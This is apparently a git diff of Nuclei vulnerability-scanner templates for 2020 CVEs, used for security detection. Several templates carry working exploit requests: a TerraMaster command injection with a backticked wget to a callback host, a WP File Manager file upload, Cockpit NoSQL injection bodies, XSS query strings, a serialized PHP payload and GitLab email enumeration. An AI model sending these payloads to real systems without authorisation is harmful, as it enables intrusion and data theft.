- "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-24949.yaml b/nuclei-templates/CVE-2020/CVE-2020-24949.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-24949.yaml rename to nuclei-templates/CVE-2020/CVE-2020-24949.yaml diff --git a/nuclei-templates/wordpress/CVE-2020-25213.yaml b/nuclei-templates/CVE-2020/CVE-2020-25213.yaml similarity index 86% rename from nuclei-templates/wordpress/CVE-2020-25213.yaml rename to nuclei-templates/CVE-2020/CVE-2020-25213.yaml index 67e680d764..be703f469b 100644 --- a/nuclei-templates/wordpress/CVE-2020-25213.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-25213.yaml @@ -1,30 +1,24 @@ id: CVE-2020-25213 - info: name: WP File Manager RCE author: foulenzer severity: critical - description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability. - reference: + description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. + reference: | - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day tags: cve,cve2020,wordpress,rce - # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-25213 - cwe-id: CWE-434 - requests: - raw: - | POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Host: {{Hostname}} Accept: */* + Content-Length: 608 Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 + Connection: close --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" @@ -48,7 +42,6 @@ requests: poc-test --------------------------ca81ac1fececda48-- - matchers-condition: and matchers: - type: word @@ -56,12 +49,10 @@ requests: - poc.txt - added condition: and - - type: word words: - application/json part: header - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-25864.yaml b/nuclei-templates/CVE-2020/CVE-2020-25864.yaml deleted file mode 100644 index c0f536ddbc..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-25864.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-25864 - -info: - name: HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) raw mode is vulnerable to cross-site scripting - severity: medium - author: c-sh0 - reference: - - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 - - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-25864 - cwe-id: CWE-79 - tags: cve,cve2020,consul,xss - -requests: - - raw: - - | - PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1 - Host: {{Hostname}} - - - - - | - GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - - type: word - part: body_2 - words: - - "" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-26073.yaml b/nuclei-templates/CVE-2020/CVE-2020-26073.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26073.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26073.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-26153.yaml b/nuclei-templates/CVE-2020/CVE-2020-26153.yaml deleted file mode 100644 index 7a0433f16c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-26153.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-26153 - -info: - name: Event Espresso Core-Reg XSS - author: pikpikcu - severity: medium - description: | - cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: - - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 - tags: cve,cve2020,xss,wordpress,wp-plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-26153 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb" - - matchers-condition: and - matchers: - - type: word - words: - - '"/>' - part: body - - - type: status - status: - - 500 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-26413.yaml b/nuclei-templates/CVE-2020/CVE-2020-26413.yaml deleted file mode 100644 index 8aeff846b2..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-26413.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2020-26413 - -info: - name: Gitlab User enumeration via Graphql API - author: _0xf4n9x_,pikpikcu - severity: medium - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. - reference: - - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 - tags: cve,cve2020,gitlab,exposure,enum,graphql - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-26413 - cwe-id: CWE-200 - -requests: - - raw: - - | - POST /api/graphql HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", - "variables": null, - "operationName": null - } - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"username":' - - '"avatarUrl":' - - '"node":' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: json - part: body - json: - - '.data.users.edges[].node.email' diff --git a/nuclei-templates/CVE-2020/CVE-2020-28036.yaml b/nuclei-templates/CVE-2020/CVE-2020-28036.yaml new file mode 100644 index 0000000000..1307d0e8cc --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-28036.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-28036 + +info: + name: > + WordPress Core < 5.5.2 - Privilege Escalation via XML-RPC + author: topscoder + severity: high + description: > + wp-includes/class-wp-xmlrpc-server.php in WordPress before 5.5.2 allows attackers to gain privileges by using XML-RPC to comment on a post. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/36e15052-0e04-4b72-b573-b736109517b8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-28036 + metadata: + shodan-query: 'vuln:CVE-2020-28036' + tags: cve,wordpress,wp-core,high + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-admin/install.php" + - "{{BaseURL}}/feed/" + - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked + + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version_by_generator, '>= 5.5', '<= 5.5.1') + - compare_versions(version_by_js, '>= 5.5', '<= 5.5.1') + - compare_versions(version_by_css, '>= 5.5', '<= 5.5.1') + + - type: status + status: + - 200 + + extractors: + - type: regex + name: version_by_generator + group: 1 + regex: + - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' + + - type: regex + name: version_by_js + group: 1 + regex: + - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' + + - type: regex + name: version_by_css + group: 1 + regex: + - 'install\.min\.css\?ver=((\d+\.?)+)\b' diff --git a/nuclei-templates/CVE-2020/CVE-2020-28037.yaml b/nuclei-templates/CVE-2020/CVE-2020-28037.yaml deleted file mode 100644 index ed52134576..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28037.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2020-28037 - -info: - name: > - WordPress Core < 5.5.2 - Misconfiguration That Allows Trigger of New Installation - author: topscoder - severity: medium - description: > - is_blog_installed in wp-includes/functions.php in WordPress before 5.5.2 improperly determines whether WordPress is already installed, which might allow an attacker to perform a new installation, leading to remote code execution (as well as a denial of service for the old installation). - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/b13f6a3f-cab6-4aff-a96e-58250fcf655a?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L - cvss-score: 4.8 - cve-id: CVE-2020-28037 - metadata: - shodan-query: 'vuln:CVE-2020-28037' - tags: cve,wordpress,wp-core,medium - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/wp-admin/install.php" - - "{{BaseURL}}/feed/" - - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked - - redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version_by_generator, '>= 5.5', '<= 5.5.1') - - compare_versions(version_by_js, '>= 5.5', '<= 5.5.1') - - compare_versions(version_by_css, '>= 5.5', '<= 5.5.1') - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version_by_generator - group: 1 - regex: - - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' - - - type: regex - name: version_by_js - group: 1 - regex: - - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' - - - type: regex - name: version_by_css - group: 1 - regex: - - 'install\.min\.css\?ver=((\d+\.?)+)\b' diff --git a/nuclei-templates/CVE-2020/CVE-2020-28038.yaml b/nuclei-templates/CVE-2020/CVE-2020-28038.yaml deleted file mode 100644 index 94e86d978a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28038.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2020-28038 - -info: - name: > - WordPress Core < 5.5.2 - Stored Cross-Site Scripting via post slugs - author: topscoder - severity: medium - description: > - WordPress before 5.5.2 allows stored XSS via post slugs. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf1ac25-2e55-4e27-af01-9b5b1997f339?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N - cvss-score: 6.4 - cve-id: CVE-2020-28038 - metadata: - shodan-query: 'vuln:CVE-2020-28038' - tags: cve,wordpress,wp-core,medium - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/wp-admin/install.php" - - "{{BaseURL}}/feed/" - - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked - - redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(version_by_generator, '>= 5.5', '<= 5.5.1') - - compare_versions(version_by_js, '>= 5.5', '<= 5.5.1') - - compare_versions(version_by_css, '>= 5.5', '<= 5.5.1') - - - type: status - status: - - 200 - - extractors: - - type: regex - name: version_by_generator - group: 1 - regex: - - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' - - - type: regex - name: version_by_js - group: 1 - regex: - - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' - - - type: regex - name: version_by_css - group: 1 - regex: - - 'install\.min\.css\?ver=((\d+\.?)+)\b' diff --git a/nuclei-templates/CVE-2020/CVE-2020-28039.yaml b/nuclei-templates/CVE-2020/CVE-2020-28039.yaml new file mode 100644 index 0000000000..5555a45b28 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-28039.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-28039 + +info: + name: > + WordPress Core < 5.5.2 - Arbitrary File Deletion + author: topscoder + severity: medium + description: > + is_protected_meta in wp-includes/meta.php in WordPress before 5.5.2 allows arbitrary file deletion because it does not properly determine whether a meta key is considered protected. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/beb70eb8-9a9c-4116-832c-337fc2a03329?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2020-28039 + metadata: + shodan-query: 'vuln:CVE-2020-28039' + tags: cve,wordpress,wp-core,medium + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-admin/install.php" + - "{{BaseURL}}/feed/" + - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked + + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version_by_generator, '>= 5.5', '<= 5.5.1') + - compare_versions(version_by_js, '>= 5.5', '<= 5.5.1') + - compare_versions(version_by_css, '>= 5.5', '<= 5.5.1') + + - type: status + status: + - 200 + + extractors: + - type: regex + name: version_by_generator + group: 1 + regex: + - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)' + + - type: regex + name: version_by_js + group: 1 + regex: + - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b' + + - type: regex + name: version_by_css + group: 1 + regex: + - 'install\.min\.css\?ver=((\d+\.?)+)\b' diff --git a/nuclei-templates/CVE-2020/CVE-2020-28188.yaml b/nuclei-templates/CVE-2020/CVE-2020-28188.yaml new file mode 100644 index 0000000000..4fac70ed9a --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-28188.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-28188 + +info: + name: TerraMaster TOS - Unauthenticated Remote Command Execution + author: gy741 + severity: critical + description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. + reference: + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + tags: cve,cve2020,terramaster,rce,oast,mirai + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/CVE-2020-28978.yaml b/nuclei-templates/CVE-2020/CVE-2020-28978.yaml new file mode 100644 index 0000000000..8991e80992 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-28978.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-28978 + +info: + name: > + Canto <= 1.9.0 - Blind Server-Side Request Forgery via tree.php + author: topscoder + severity: high + description: > + The Canto plugin 1.9.0 for WordPress contains blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/tree.php?subdomain=SSRF. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c03cf3a2-3be9-44da-a050-a5978eb3eadc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: CVE-2020-28978 + metadata: + fofa-query: "wp-content/plugins/canto/" + google-query: inurl:"/wp-content/plugins/canto/" + shodan-query: 'vuln:CVE-2020-28978' + tags: cve,wordpress,wp-plugin,canto,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/canto/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "canto" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-29164.yaml b/nuclei-templates/CVE-2020/CVE-2020-29164.yaml new file mode 100644 index 0000000000..9ff125238d --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-29164.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-29164 + +info: + name: PacsOne Server XSS + description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS). + author: geeknik + severity: medium + tags: pacsone,xss,cve,cve2020 + reference: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-29164 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - '1' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-29453.yaml b/nuclei-templates/CVE-2020/CVE-2020-29453.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29453.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29453.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-35338.yaml b/nuclei-templates/CVE-2020/CVE-2020-35338.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35338.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35338.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35846.yaml b/nuclei-templates/CVE-2020/CVE-2020-35846.yaml deleted file mode 100644 index b012cee002..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-35846.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-35846 - -info: - name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check - author: dwisiswant0 - severity: critical - description: | - Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. - The $eq operator matches documents where the value of a field equals the specified value. - reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ - tags: cve,cve2020,nosqli,sqli,cockpit,injection - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-35846 - cwe-id: CWE-89 - -requests: - - method: POST - path: - - "{{BaseURL}}/auth/check" - headers: - Content-Type: application/json - body: | - { - "auth": { - "user": { - "$eq": "admin" - }, - "password": [ - 0 - ] - } - } - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "password_verify() expects parameter" diff --git a/nuclei-templates/CVE-2020/CVE-2020-35848.yaml b/nuclei-templates/CVE-2020/CVE-2020-35848.yaml new file mode 100644 index 0000000000..b560962774 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-35848.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-35848 + +info: + name: Cockpit prior to 0.12.0 NoSQL injection in /auth/newpassword + author: dwisiswant0 + severity: critical + description: | + newpassword method of the Auth controller, + which is responsible for displaying the user password reset form. + reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ + tags: cve,cve2020,nosqli,sqli,cockpit,injection + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35848 + cwe-id: CWE-89 + +requests: + - method: POST + path: + - "{{BaseURL}}/auth/newpassword" + headers: + Content-Type: application/json + body: | + { + "token": { + "$func": "var_dump" + } + } + + matchers: + - type: regex + part: body + regex: + - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' diff --git a/nuclei-templates/CVE-2020/CVE-2020-36155.yaml b/nuclei-templates/CVE-2020/CVE-2020-36155.yaml deleted file mode 100644 index ddf1c11043..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-36155.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-36155 - -info: - name: > - Ultimate Member <= 2.1.11 - Unauthenticated Privilege Escalation via User Meta - author: topscoder - severity: critical - description: > - An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Meta. An attacker could supply an array parameter for sensitive metadata, such as the wp_capabilities user meta that defines a user's role. During the registration process, submitted registration details were passed to the update_profile function, and any metadata was accepted, e.g., wp_capabilities[administrator] for Administrator access. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2ac5c8-9e76-40b8-a2a4-8cb4291871f2?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2020-36155 - metadata: - fofa-query: "wp-content/plugins/ultimate-member/" - google-query: inurl:"/wp-content/plugins/ultimate-member/" - shodan-query: 'vuln:CVE-2020-36155' - tags: cve,wordpress,wp-plugin,ultimate-member,critical - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/ultimate-member/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ultimate-member" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36157.yaml b/nuclei-templates/CVE-2020/CVE-2020-36157.yaml deleted file mode 100644 index b10a02c560..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-36157.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-36157 - -info: - name: > - Ultimate Member <= 2.1.11 - Unauthenticated Privilege Escalation via User Roles - author: topscoder - severity: critical - description: > - An issue was discovered in the Ultimate Member plugin before 2.1.12 for WordPress, aka Unauthenticated Privilege Escalation via User Roles. Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability (or any custom Ultimate Member role) and effectively be granted those privileges. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/1081eeb1-3240-478d-8679-7bf9293b5a95?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2020-36157 - metadata: - fofa-query: "wp-content/plugins/ultimate-member/" - google-query: inurl:"/wp-content/plugins/ultimate-member/" - shodan-query: 'vuln:CVE-2020-36157' - tags: cve,wordpress,wp-plugin,ultimate-member,critical - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/ultimate-member/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ultimate-member" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36289.yaml b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml deleted file mode 100644 index 7b2c0afd15..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-36289.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-36289 - -info: - name: Atlassian Jira Unauth User Enumeration - author: dhiyaneshDk - severity: medium - description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. - tags: cve,cve2020,jira,atlassian,unauth - reference: - - https://twitter.com/ptswarm/status/1402644004781633540 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-36289 - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' - - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'rel=\"admin\"' - - - type: word - words: - - 'application/json' - part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-36710.yaml b/nuclei-templates/CVE-2020/CVE-2020-36710.yaml new file mode 100644 index 0000000000..987a6ea7a0 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36710.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-36710 + +info: + name: > + WPS Hide Login <= 1.5.4.2 - Hidden Login Page Location Disclosure + author: topscoder + severity: medium + description: > + The WPS Hide Login plugin for WordPress is vulnerable to login page disclosure even when the settings of the plugin are set to hide the login page making it possible for unauthenticated attackers to brute force credentials on sites in versions up to, and including, 1.5.4.2. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7808329f-1688-480c-a83c-c4ab2fa86da6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-36710 + metadata: + fofa-query: "wp-content/plugins/wps-hide-login/" + google-query: inurl:"/wp-content/plugins/wps-hide-login/" + shodan-query: 'vuln:CVE-2020-36710' + tags: cve,wordpress,wp-plugin,wps-hide-login,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wps-hide-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.4.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36739.yaml b/nuclei-templates/CVE-2020/CVE-2020-36739.yaml deleted file mode 100644 index 100c5fe300..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-36739.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-36739 - -info: - name: > - Feed Them Social – Page, Post, Video, and Photo Galleries <= 2.8.6 - Cross-Site Request Forgery Bypass - author: topscoder - severity: medium - description: > - The Feed Them Social – Page, Post, Video, and Photo Galleries plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the my_fts_fb_load_more() function. This makes it possible for unauthenticated attackers to load feeds via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fcbe3d1-449c-4135-bbf5-9ea9236e5328?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.3 - cve-id: CVE-2020-36739 - metadata: - fofa-query: "wp-content/plugins/feed-them-social/" - google-query: inurl:"/wp-content/plugins/feed-them-social/" - shodan-query: 'vuln:CVE-2020-36739' - tags: cve,wordpress,wp-plugin,feed-them-social,medium - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/feed-them-social/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "feed-them-social" - part: body - - - type: dsl - dsl: - - 